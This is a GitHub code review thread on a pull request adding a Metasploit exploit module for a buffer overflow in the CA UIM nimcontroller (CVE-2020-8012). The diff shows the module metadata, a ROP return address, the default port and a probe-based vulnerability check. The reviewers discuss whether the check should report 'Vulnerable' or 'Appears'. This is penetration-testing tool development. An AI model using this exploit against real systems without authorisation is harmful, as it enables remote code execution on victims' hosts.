modules/exploits/windows/nimsoft/nimcontroller_bof.rb

```diff
@@ -0,0 +1,452 @@
+        The vulnerability occurs in the robot (controller) component when sending a specially crafted directory_list
+        probe.
+
+        Technically speaking the target host must also be vulnerable to CVE-2020-8010 in order to reach the
+        directory_list probe.
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'wetw0rk' # Vulnerability Discovery and Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2020-8010' ], # CA UIM Probe Improper ACL Handling RCE (Multiple Attack Vectors)
+          [ 'CVE', '2020-8012' ], # CA UIM nimbuscontroller Buffer Overflow RCE
+          [ 'URL', 'https://support.broadcom.com/external/content/release-announcements/CA20200205-01-Security-Notice-for-CA-Unified-Infrastructure-Management/7832' ],
+          [ 'PACKETSTORM', '156577' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC'      => 'process',
+          'AUTORUNSCRIPT' => 'post/windows/manage/migrate'
+        },
+      'Payload'        =>
+        {
+          'Space'         => 2000,
+          'DisableNops'   => true
+        },
+      'Platform'       => 'win',
+      'Arch'           => ARCH_X64,
+      'Targets'        =>
+        [
+          [
+            'Windows Universal (x64) - v7.80.3132',
+            {
+              'Platform' => 'win',
+              'Arch'     => [ARCH_X64],
+              'Version'  => "7.80 [Build 7.80.3132, Jun  1 2015]",
+              'Ret'      => 0x000000014006fd3d # pop rsp; or al, 0x00; add rsp, 0x0000000000000448 ; ret [controller.exe]
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Feb 05 2020',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('DIRECTORY', [false, 'Directory path to obtain a listing', 'C:\\']),
+        Opt::RPORT(48000),
+      ])
+
+  end
+
+  # check: there are only two prerequisites to getting code execution. The version number
+  # and access to the directory_list probe. The easiest way to get this information is to
+  # ask nicely ;)
+  def check
+
+    connect
+
+    sock.put(generate_probe("get_info", ["interfaces=0"]))
+    response = sock.get_once(4096)
+
+    i = 0
+    list_check = -1
+    target_version = ""
+    info = response.split("\x00")
+
+    while i < info.length
+      if "version".in? info[i]
+        target_version = info[i+3]
+        break
+      end
+      i +=1
+    end
+
+    begin
+      if target['Version'].in? response
+        print_status("Version #{target['Version']} detected, sending directory_list probe")
+        sock.put(generate_probe("directory_list", ["directory=#{datastore['DIRECTORY']}", "detail=1"]))
+        list_check = parse_listing(sock.get_once(4096), datastore['DIRECTORY'])
+      end
+    ensure
+      disconnect
+      if list_check == 0
+        return CheckCode::Vulnerable
```

Comment:
```suggestion
        return CheckCode::Appears
```

Since this only checks the version and doesn't trigger the overflow itself, we only have enough information to say `CheckCode::Appears`.

Reply:
Hmm, Is it ok if I add the appears if I do not get the listing? There was no patch for this version other than upgrading (If I remember correctly). So if you get the version + listing its guaranteed exploitable. Kinda like this:

```ruby
103       if list_check == 0
104         return CheckCode::Vulnerable
105       else
106         return CheckCode::Appears
107       end
108     end
```

The only thing stopping exploitation is access to the `directory_list` probe

Reply:
While it's probably not an issue for this piece of software, a number of vendors have a history of silently backporting security fixes to old software without changing the version number. To help manage our end-users' expectations the policy is that anything that hasn't actually exploited the vulnerability in the check needs to return `Appears` to help avoid of the confusion of "it says `Vulnerable`, but I can't exploit it!"

Reply:
Ok makes sense went ahead and pushed the changes 😄

Reply:
Thanks!